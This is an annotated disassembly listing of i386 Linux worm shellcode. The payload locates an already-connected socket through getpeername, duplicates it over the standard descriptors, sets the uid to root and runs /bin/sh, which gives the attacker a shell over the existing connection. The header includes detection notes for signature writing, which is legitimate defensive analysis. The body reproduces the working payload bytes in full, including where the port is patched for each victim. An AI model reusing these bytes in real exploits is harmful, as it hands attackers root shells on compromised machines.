; Analyst annotation of a 32-bit Linux (int 0x80) payload listing, as dumped
; by a disassembler (offset / raw bytes / mnemonic). Not assemblable as-is.
; Structure: NOP sled -> locate the already-connected socket by scanning
; descriptors with getpeername() -> dup2() it over fd 0/1/2 -> setresuid(0,0,0)
; -> execve("/bin//sh"). Syscall numbers are i386: socketcall=0x66 (102),
; dup2=0x3f (63), setresuid=0xa4 (164, 16-bit uid variant), execve=0xb (11).
; Detection notes: the byte pairs 0x31DB/0x89E7 followed by a socketcall loop,
; the dword strings 0x68732f2f ("//sh") / 0x6e69622f ("/bin"), and the dup2
; triplet are the characteristic fragments; the 0x3412 word is patched per
; victim (see comment below), so do not key on it.
000000D0 EB0A jmp short 0xdc ; skip over the NOP sled
000000D2 90 nop
000000D3 90 nop
000000D4 90 nop
000000D5 90 nop
000000D6 90 nop
000000D7 90 nop
000000D8 90 nop
000000D9 90 nop
000000DA 90 nop
000000DB 90 nop
000000DC 31DB xor ebx,ebx ; ebx = 0
000000DE 89E7 mov edi,esp ; edi -> socketcall argument array built on the stack
000000E0 8D7710 lea esi,[edi+0x10] ; esi -> sockaddr output buffer (esp+0x10)
000000E3 897704 mov [edi+0x4],esi ; args[1] = &sockaddr
000000E6 8D4F20 lea ecx,[edi+0x20] ; ecx -> socklen_t slot (esp+0x20)
000000E9 894F08 mov [edi+0x8],ecx ; args[2] = &len
000000EC B310 mov bl,0x10 ; ebx = 16 = sizeof(struct sockaddr_in)
000000EE 8919 mov [ecx],ebx ; *len = 16
000000F0 31C9 xor ecx,ecx
000000F2 B1FF mov cl,0xff ; search for socket that connects to the worm
; ecx doubles as the loop counter and the candidate fd, walked from 255 down to 1
000000F4 890F mov [edi],ecx ; args[0] = candidate fd
000000F6 51 push ecx ; counter is clobbered by the syscall setup below, so save it
000000F7 31C0 xor eax,eax
000000F9 B066 mov al,0x66 ; socketcall
000000FB B307 mov bl,0x7 ; getpeername
000000FD 89F9 mov ecx,edi ; ecx -> args array
000000FF CD80 int 0x80 ; eax = getpeername(fd, &sockaddr, &len)
00000101 59 pop ecx ; restore counter/fd
00000102 31DB xor ebx,ebx
00000104 39D8 cmp eax,ebx ; returned 0 -> fd is a connected socket
00000106 750A jnz 0x112 ; not a connected socket: next candidate
00000108 66B81234 mov ax,0x3412 ; replaced with local port # (network byte order)
0000010C 66394602 cmp [esi+0x2],ax ; sockaddr_in.sin_port == expected port?
00000110 7402 jz 0x114 ; match: ecx holds the fd to reuse
00000112 E2E0 loop 0xf4 ; dec ecx; jnz -> if no match after 255 fds, falls through with ecx = 0
00000114 89CB mov ebx,ecx ; ebx = matched fd (or 0 when the scan is exhausted)
00000116 31C9 xor ecx,ecx
00000118 B103 mov cl,0x3 ; duplicate socket onto standard input, output and error
0000011A 31C0 xor eax,eax
0000011C B03F mov al,0x3f ; dup2
0000011E 49 dec ecx ; target fd = 2, 1, 0 on successive iterations
0000011F CD80 int 0x80 ; dup2(sockfd, ecx)
00000121 41 inc ecx ; undo the dec so loop's own decrement drives the count
00000122 E2F6 loop 0x11a ; try to get root
00000124 31C9 xor ecx,ecx ; ecx = 0
00000126 F7E1 mul ecx ; eax = edx = 0 without using an immediate
00000128 51 push ecx
00000129 5B pop ebx ; ebx = 0
0000012A B0A4 mov al,0xa4 ; setresuid16
0000012C CD80 int 0x80 ; setresuid(0, 0, 0); execute /bin/sh
0000012E 31C0 xor eax,eax
00000130 50 push eax ; NUL terminator for the path string
00000131 682F2F7368 push dword 0x68732f2f ; "//sh"
00000136 682F62696E push dword 0x6e69622f ; "/bin"
0000013B 89E3 mov ebx,esp ; ebx -> "/bin//sh"
0000013D 50 push eax ; argv[1] = NULL
0000013E 53 push ebx ; argv[0] = path
0000013F 89E1 mov ecx,esp ; ecx -> argv
00000141 99 cdq ; edx = 0 (envp = NULL), since eax is 0
00000142 B00B mov al,0xb ; execve
00000144 CD80 int 0x80 ; execve("/bin//sh", argv, NULL)